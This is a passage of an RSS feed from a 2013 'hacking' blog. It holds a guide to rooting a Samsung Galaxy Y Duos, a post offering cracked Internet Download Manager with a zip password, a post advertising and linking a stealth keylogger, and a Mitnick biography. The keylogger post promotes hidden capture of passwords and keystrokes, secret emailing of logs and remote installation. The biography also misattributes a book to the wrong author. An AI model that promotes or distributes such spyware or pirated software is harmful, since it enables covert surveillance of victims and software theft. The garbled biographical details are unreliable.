&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/2tqc4la2570ay3r/rooted-6102.zip" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;What is CWM-6102.zip &lt;b&gt;?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;b&gt;ClockworkMod Recovery&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; ClockworkMod Recovery (CWM) is a replacement recovery option for Android devices, made by Koushik "Koush" Dutta. It is based on the Android 2.1 (Eclair) recovery image. Features include Nandroid backup, adb shell, advanced update.zip options (ignore asserts and signature checks), and file browser for choosing update.zips&lt;br /&gt;
The Rom Manager app may be used for installing CWM, overwriting the device's stock recovery. As with the stock recovery, CWM can apply software changes to the device. Unlike the stock recovery, CWM is able to entirely replace the device's primary Android operating system ("flashing a new ROM"), including with aftermarket replacements such as CyanogenMod. Once installed, CWM it is accessed by turning your phone off, then triggering the bootloader prompt by holding down some device-dependent button combination as it is turned on.&lt;br /&gt;
CWM is also known as clockwork and CW recovery.&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Rooting S6102:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
Enable the USB Debugging Mode on your Galaxy Y Duos. Follow the path to enable it ‘Settings&amp;gt;Applications&amp;gt;Development&amp;gt;USB Debugging’. Now, check the USB Debugging option.&lt;br /&gt;
&lt;br /&gt;
Before starting please backup all your data&lt;br /&gt;
&lt;br /&gt;
Copy the downloaded file into your SD card. Turn off phone.&lt;br /&gt;
&lt;br /&gt;
Press &amp;amp; hold (“Power + Volume Up + Home”) keys &amp;amp; only let go of it when the Samsung Galaxy Y Duos logo appears.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&amp;nbsp;Now you enter recovery mode. Select the file “CWM-6102.zip” from SD card. ( for scrolling use volume up and down keys. For selecting use home button)&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Now again you enter recovery mode. Select the file “update.zip” from SD card. ( for scrolling use volume up and down keys. For selecting use home button)&lt;br /&gt;
&lt;br /&gt;
Confirm you selection by saying ‘Yes’ to the process.&lt;br /&gt;
&lt;br /&gt;
This may take few minutes to finish the process.&lt;br /&gt;
&lt;br /&gt;
Phone will be reboot Automatic.&lt;br /&gt;
&lt;br /&gt;
Now, you have successfully rooted your Samsung Galaxy Y Duos.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/08/root-samsung-galaxy-y-duos-gt-s6102.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5HnrzFtpSxUjh9VJ6EBkllubAXg9_mnCM8B9kem36gnPDAOTmDcX7VOWD-Ii2vGopwUyTUnFUqSBIPgEWbLfuZks4xtB4t_05sJdDSw06Bo4nIL4mk8afbZrlGBYQL4i71Tn3Vzqn8QA/s72-c/root-samsung-galaxy-S6102.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-6396016216387256661</guid><pubDate>Sat, 27 Jul 2013 18:27:00 +0000</pubDate><atom:updated>2013-07-27T11:29:05.824-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>IDM Latest 7.1 Full Versions Cracked </title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-6jOA91eFdkAiEW035kVC7BbbHz9oUHeDLHW75Zo1MT-ourKnOAIyWY05olGnPxboUJK5feKetXjJglnH4rX0PYfI60L9SMi4b1rQCSJHA8oNfvxTao8tzVYmbH0hPqSHcuBGV8snYe0/s1600/IDM-Latest-7.1-Full-Versions-Cracked.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-6jOA91eFdkAiEW035kVC7BbbHz9oUHeDLHW75Zo1MT-ourKnOAIyWY05olGnPxboUJK5feKetXjJglnH4rX0PYfI60L9SMi4b1rQCSJHA8oNfvxTao8tzVYmbH0hPqSHcuBGV8snYe0/s1600/IDM-Latest-7.1-Full-Versions-Cracked.jpg" height="207" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;b&gt;&amp;nbsp;IDM Latest 7.1 Full Versions Cracked &lt;/b&gt;&lt;/h3&gt;
Version 7.1 has added Windows 8 compatibility, adds IDM download panel for web-players that can be used to download flash videos from sites like YouTube, MySpaceTV, and Google Videos. It also features complete Windows 7 and Vista support, YouTube grabber, redeveloped scheduler, and MMS protocol support. The new version also adds improved integration for IE 10 and IE based browsers, redesigned and enhanced download engine, the unique advanced integration into all latest browsers, improved toolbar, and a wealth of other improvements and new features.&lt;br /&gt;
&lt;br /&gt;
Zip pass : hackhippo &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://share.cx.com/F8Q7KM" rel="nofollow" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Oc4-lDmzszbrdPD3Z33nFmfvWP7SAS4hu5RpTbZL6GLuFVOwSH6J-cNo9hq4UAiIj0r5KbqBJjYl3vBNbL3P9bQBQWwcee45jSPOiQgVTr6INTJF9eRcWzJE3c34eEHh79kY9BmI8x0/s1600/download_button.png" height="48" width="180" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/07/idm-latest-71-full-versions-cracked.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-6jOA91eFdkAiEW035kVC7BbbHz9oUHeDLHW75Zo1MT-ourKnOAIyWY05olGnPxboUJK5feKetXjJglnH4rX0PYfI60L9SMi4b1rQCSJHA8oNfvxTao8tzVYmbH0hPqSHcuBGV8snYe0/s72-c/IDM-Latest-7.1-Full-Versions-Cracked.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-8320873488209992340</guid><pubDate>Sat, 27 Jul 2013 18:05:00 +0000</pubDate><atom:updated>2013-07-27T11:05:54.652-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Hackers</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>Award Keylogger Pro 3.2</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Award Key-logger Pro 3.2 Program Key Features:&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbIGpIqhyphenhyphenW4_iDtcb2Ra0svJFR0O54tpeyP8fjhcl5FDJ2sbQy2zLRR8-ufUvxVPQUUTjMYtL8AFWAv_xNqC4i0DZrUNq6wtYzma1GyUSEHBtp7mv0dnysCguzdhzHRf5TvrasgH11yE/s1600/Award-Keylogger-Pro-3.2-Hack-Hippo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbIGpIqhyphenhyphenW4_iDtcb2Ra0svJFR0O54tpeyP8fjhcl5FDJ2sbQy2zLRR8-ufUvxVPQUUTjMYtL8AFWAv_xNqC4i0DZrUNq6wtYzma1GyUSEHBtp7mv0dnysCguzdhzHRf5TvrasgH11yE/s1600/Award-Keylogger-Pro-3.2-Hack-Hippo.jpg" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ol start="1" style="margin-top: 0in;" type="1"&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;New! Facilitates Windows 8&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Absolutely invisible/stealth mode&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Record key strokes entered on any applications&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Logs records and security passwords entered in the      every application&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Logs concept entered in all immediate messengers&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Multiple watches support&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Record pc screenshots by interval&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Record sites visited&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Keyword Recognition and Notification&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Stealthy &amp;amp; unseen Tracking, Recording&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Secretly deliver records to e-mail box or FTP space&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Password protected&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Remote Installation&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Simple to use HTML data format for e-mailed logs&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Invisible in Windows NT/2000/XP Process Manager and      Windows 9.x/Me Process List&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Records Windows 9.x/Me/2000/XP/VISTA logon passwords&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Intercepts DOS-box and Java-chat keystrokes&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Facilitates international keyboards&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;External log viewer&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Facilitates printing of the log Enhanced for Windows      XP&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo2; tab-stops: list .5in; text-align: justify;"&gt;Exports log to HTML.&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://share.cx.com/D78QYv" rel="nofollow" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Oc4-lDmzszbrdPD3Z33nFmfvWP7SAS4hu5RpTbZL6GLuFVOwSH6J-cNo9hq4UAiIj0r5KbqBJjYl3vBNbL3P9bQBQWwcee45jSPOiQgVTr6INTJF9eRcWzJE3c34eEHh79kY9BmI8x0/s1600/download_button.png" height="40" width="120" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/07/award-keylogger-pro-32.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbIGpIqhyphenhyphenW4_iDtcb2Ra0svJFR0O54tpeyP8fjhcl5FDJ2sbQy2zLRR8-ufUvxVPQUUTjMYtL8AFWAv_xNqC4i0DZrUNq6wtYzma1GyUSEHBtp7mv0dnysCguzdhzHRf5TvrasgH11yE/s72-c/Award-Keylogger-Pro-3.2-Hack-Hippo.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-3808541635757478362</guid><pubDate>Wed, 24 Jul 2013 14:45:00 +0000</pubDate><atom:updated>2013-10-21T00:01:46.810-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hackers</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Hacking News</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Others News</category><title>Kevin David Mitnick - Source of Inspiration for me</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzr3ccSZttxRCwSFpbJ38u0XyAjj-9-iV7hKYOmMBITqEj9vsPSG8LFvUI9wvHK_SidTXoBeXzf5I5Ff7mDofE5qtx7bZ9Y8btNyMeMzo9gbDnYdpOR5o_zUib-rosANQqqCvGNyLAI8o/s1600/Kevin-David-Mitnick.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzr3ccSZttxRCwSFpbJ38u0XyAjj-9-iV7hKYOmMBITqEj9vsPSG8LFvUI9wvHK_SidTXoBeXzf5I5Ff7mDofE5qtx7bZ9Y8btNyMeMzo9gbDnYdpOR5o_zUib-rosANQqqCvGNyLAI8o/s1600/Kevin-David-Mitnick.jpg" height="177" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;Kevin David Mitnick&lt;/b&gt; (born October 6, 1963) is a controversial computer hacker and convicted criminal in the United States.&lt;br /&gt;
&amp;nbsp;Mitnick was convicted in the late 1990s of illegally gaining access to computer networks and stealing intellectual property. Though Mitnick has been convicted of computer related crimes and possession of several forged identification documents, his supporters argue that his punishment was excessive.&lt;br /&gt;
&lt;br /&gt;
Mitnick served five years in prison, of which four and a half years were pre-trial, and eight months were in solitary confinement. He was released on January 21, 2000. During his supervised release, which ended on January 21, 2003, he was initially restricted from using any communications technology other than a landline telephone. Mitnick fought this decision in court, and the judge ruled in his favor, allowing him to access the Internet.&lt;br /&gt;
Mitnick now runs Mitnick Security Consulting, a computer security consultancy.&lt;br /&gt;
&lt;br /&gt;
Early life :&lt;br /&gt;
Kevin Mitnick began social engineering or perhaps discovered his first engineerable situation at the age of 12. He realized he could bypass the punchcard system used for the Los Angeles bus system: by buying his own punch, he could get free bus rides anywhere in the greater LA area. Social engineering became his primary method of obtaining information, whether it be user names and passwords, modem phone numbers or any number of other pieces of data.&lt;br /&gt;
&lt;br /&gt;
In high school, he was introduced to phone phreaking, the activity of manipulating telephones which was often used to evade long distance charges for his benefit..&lt;br /&gt;
&lt;br /&gt;
Computer hacking :&lt;br /&gt;
Mitnick broke into his first computer network in 1979, when a friend gave him the phone number for the Ark, the computer system at Digital Equipment Corporation (DEC) used for developing their RSTS/E operating system software. He broke into DEC's computer network and copied DEC's software, for which he was later convicted. This was the first of a series of run-ins with the law..&lt;br /&gt;
&lt;br /&gt;
Acts by Kevin Mitnick :&lt;br /&gt;
Using the Los Angeles bus transfer system to get free rides&lt;br /&gt;
Evading the FBI&lt;br /&gt;
Hacking into DEC system(s) to view VMS source code (DEC reportedly spent $160,000 in cleanup costs)&lt;br /&gt;
Gaining full admin privileges to an IBM minicomputer at the Computer Learning Center in LA&lt;br /&gt;
Hacking Motorola, NEC, Nokia, Sun Microsystems and Fujitsu Siemens systems&lt;br /&gt;
&lt;br /&gt;
Alleged :&lt;br /&gt;
Stole computer manuals from a Pacific Bell telephone switching center in Los Angeles&lt;br /&gt;
Read the e-mail of computer security officials at MCI Communications and Digital&lt;br /&gt;
Wiretapped the California DMV&lt;br /&gt;
Made free cell phone calls&lt;br /&gt;
Hacked SCO, PacBell, FBI, Pentagon, Novell, CA DMV, USC and Los Angeles Unified School District systems.&lt;br /&gt;
&lt;br /&gt;
Kevin Mitnick myths: &lt;br /&gt;
Hacked into NORAD&lt;br /&gt;
"Theft of... at least 20,000 credit card numbers from computer systems around the nation"&lt;br /&gt;
Ability to launch nuclear weapons by whistling into a payphone&lt;br /&gt;
Issued a false press release for Security Pacific Bank causing a $400 million loss in market capitilization&lt;br /&gt;
Changed a judge's TRW credit report&lt;br /&gt;
Wiretapped FBI agents&lt;br /&gt;
Turned off the utilities of an FBI agent&lt;br /&gt;
Vandalized many government, corporate and university computer systems.&lt;br /&gt;
Hacked into Tsutomu Shimomura's home computer&lt;br /&gt;
Harassed actress Kristy McNichol.&lt;br /&gt;
&lt;br /&gt;
Controversy : &lt;br /&gt;
Kevin Mitnick's criminal activities, arrest, and trial were controversial, as was the journalism surrounding his conviction.&lt;br /&gt;
The controversy is highlighted by the differing views offered in two books: John Markoff and Tsutomu Shimomura's Takedown, and Bendelladj Hamza's The Fugitive Game. Littman made four notable allegations:&lt;br /&gt;
&lt;br /&gt;
journalistic impropriety by Markoff, who had covered the case for the New York Times&lt;br /&gt;
overzealous prosecution of Mitnick by the government&lt;br /&gt;
mainstream media over-hyping Mitnick's actual crimes&lt;br /&gt;
Shimomura's involvement in the matter being unclear or of dubious legality&lt;br /&gt;
Further controversy came over the release of the movie Takedown, with Littman alleging that portions of the film were taken from his book without permission.&lt;br /&gt;
&lt;br /&gt;
The case against Mitnick tested then-nascent laws that had been enacted for dealing with computer crime, and it raised public awareness of security issues involving networked computers. The controversy remains, however, as Mitnick is often used today as an example of the quintessential computer criminal although his exploits are less notable than his notoriety suggests.&lt;br /&gt;
&lt;br /&gt;
Supporters of Mitnick have asserted that many of the charges against him were fraudulent and not based on actual losses.&lt;br /&gt;
Falsehoods have also surrounded Mitnick's exploits. For example, many mistakenly believe that Mitnick was once in the FBI's most wanted list. Federal prosecutor Kent Walker said in an interview with the New York Times that Mitnick " was arguably the most wanted computer hacker in the world, he allegedly had access to corporate trade secrets worth millions of dollars. He was a very big threat". The headline of the resultant article, "A Most-Wanted Cyberthief Is Caught in His Own Web," was later picked up by Associated Press, Time Magazine and Reuters, thus perpetuating the myth.&lt;br /&gt;
&lt;br /&gt;
While Mitnick's actual actions may not have justified the level of official concern they received, the fact that his activities were criminal is not disputed. Mitnick's first adult criminal sentence was considerably shorter than is the norm today.&lt;br /&gt;
The film Freedom Downtime, a documentary that centers on the topics of Kevin Mitnick's incarceration in a maximum security prison, Miramax's film's screen adaptation of Takedown, and the "FREE KEVIN" movement, was made in 2001 by Emmanuel Goldstein and produced by 2600 Films.&lt;br /&gt;
&lt;br /&gt;
Attacks on Mitnick's sites : &lt;br /&gt;
On August 20, 2006, Kevin Mitnick's site was defaced by Palestine PHP Emperor with offensive messages against him. The domain names defensivethinking.com, mitsec.com, kevinmitnick.com and mitnicksecurity.com displayed the vandalism for hours before the affected files were replaced.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Mitnick commented: The Web hosting provider that hosts my sites was hacked, fortunately, I don't keep any confidential data on my Web site, so it wasn't that serious. Of course it is embarrassing to be defaced-nobody likes it.&lt;br /&gt;
&lt;br /&gt;
As a notorious figure, Mitnick has been targeted by hackers who wish to bolster their status and for people seeking to prove their abilities.&lt;br /&gt;
Zone-H reports that on one occasion, there was a struggle between different black hat and white hat hackers when some defacers put their nicks on Mitnick's site and fans replaced the vandalized copy with an original unmodified one. This went on for a full day.&lt;br /&gt;
&lt;br /&gt;
Recent activity : &lt;br /&gt;
Kevin Mitnick is now a professional computer consultant (doing business as Mitnick Security Consulting, LLC), and has co-authored two books on computer security: The Art of Deception (2002), which focuses on social engineering, and The Art of Intrusion (2005), focusing on real stories of security exploits.&lt;br /&gt;
&lt;br /&gt;
He co-authored (with Alexis Kasperavicius) a social engineering prevention training course and certification: CSEPS.&lt;br /&gt;
On August 20, 2006, a Syrian editor, Nidal Maalouf, accused Mitnick of stealing his domain name (Syria-news.com). He falsely claimed that Mitnick is the FBI's No.1 wanted person for illegal acts against a number of internet sites. Maalouf was interviewed by the local newspaper "Bourses &amp;amp; Markets", and the interview was quoted by Al-Ayham Saleh on his personal website.&lt;br /&gt;
&lt;br /&gt;
Mitnick occasionally appears on the late night radio show Coast to Coast AM. He has also hosted the show, interviewing Steve Wozniak (on April 30, 2006) and others.&lt;br /&gt;
&lt;br /&gt;
Mitnick has spoken at events: IAPP (International Association of Privacy Professionals) Privacy Academy in Las Vegas, October, 2005 (keynote speaker); National Youth Leadership Forum on Technology in San Jose, CA, in the summer of 2004; the Fifth H.O.P.E. in New York, NY, July, 2004 (keynote speaker); ITESM Monterrey Tec, in February 2003 (keynote speaker).&lt;br /&gt;
&lt;br /&gt;
Kevin Mitnick was a "surprise guest" in the 40th TWiT podcast when he ran into Steve Wozniak by chance in Las Vegas. Wozniak was on the line with fellow TWiT hosts via Skype on his notebook computer, and Mitnick remained with Wozniak for much of the remainder of the show.&lt;br /&gt;
Kevin Mitnick appeared on "Thebroken", an online videozine marketing itself as 'borderline legal.' He appeared on the third episode of the show, but was given mention in the first.&lt;br /&gt;
&lt;br /&gt;
Mitnick guest starred in a first season episode of Alias. The casting was an in-joke, since Mitnick played a CIA hacker. Due to the conditions of his parole, however, the computer he used in the scene was a prop.&lt;br /&gt;
&lt;br /&gt;
Kevin Mitnick appeared on the South African actuality programme "Carte Blanche".&lt;br /&gt;
&lt;br /&gt;
On 2 March 2007, the WELL declined his application for admission, refunding his membership fee.&lt;br /&gt;
Mitnick teamed up with John Walsh on the November 10, 2007 episode of America's Most Wanted on a segment on Edward Pena, another computer hacker.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;Authors&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;...............................................................................................................................................................&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: left;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuGdRII3YrfFfHe71yn7W-59HPbmIcV27mHmv_dt2dVYZUV_KZs4av4ZwANIr8YlHy_GVXzywN_gTWrRwoFJpFOpYoTnVo0WMPRurPsoJmTK3eDiXtU9dzaz6CpsKYDiZ_k3vGkX4_10Y/s1600/1337C001-Manish.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuGdRII3YrfFfHe71yn7W-59HPbmIcV27mHmv_dt2dVYZUV_KZs4av4ZwANIr8YlHy_GVXzywN_gTWrRwoFJpFOpYoTnVo0WMPRurPsoJmTK3eDiXtU9dzaz6CpsKYDiZ_k3vGkX4_10Y/s1600/1337C001-Manish.jpg" height="120" width="90" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Manish Pathak (1337C001)&amp;nbsp;&lt;/b&gt;President at 3xpl017-Hunters&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19px; text-align: -webkit-auto;"&gt;&lt;/span&gt;&lt;strong&gt;Follow him @&amp;nbsp;&lt;/strong&gt;Twitter | LinkedIn | Google |&amp;nbsp;Email&amp;nbsp;|&amp;nbsp;&lt;a href="http://facebook.com/1337C001" rel="nofollow" target="_blank"&gt;Facebook Profile&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/07/kevin-david-mitnick-source-of.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzr3ccSZttxRCwSFpbJ38u0XyAjj-9-iV7hKYOmMBITqEj9vsPSG8LFvUI9wvHK_SidTXoBeXzf5I5Ff7mDofE5qtx7bZ9Y8btNyMeMzo9gbDnYdpOR5o_zUib-rosANQqqCvGNyLAI8o/s72-c/Kevin-David-Mitnick.jpg" width="72"/><thr:total>0</thr:total></item></channel></rss>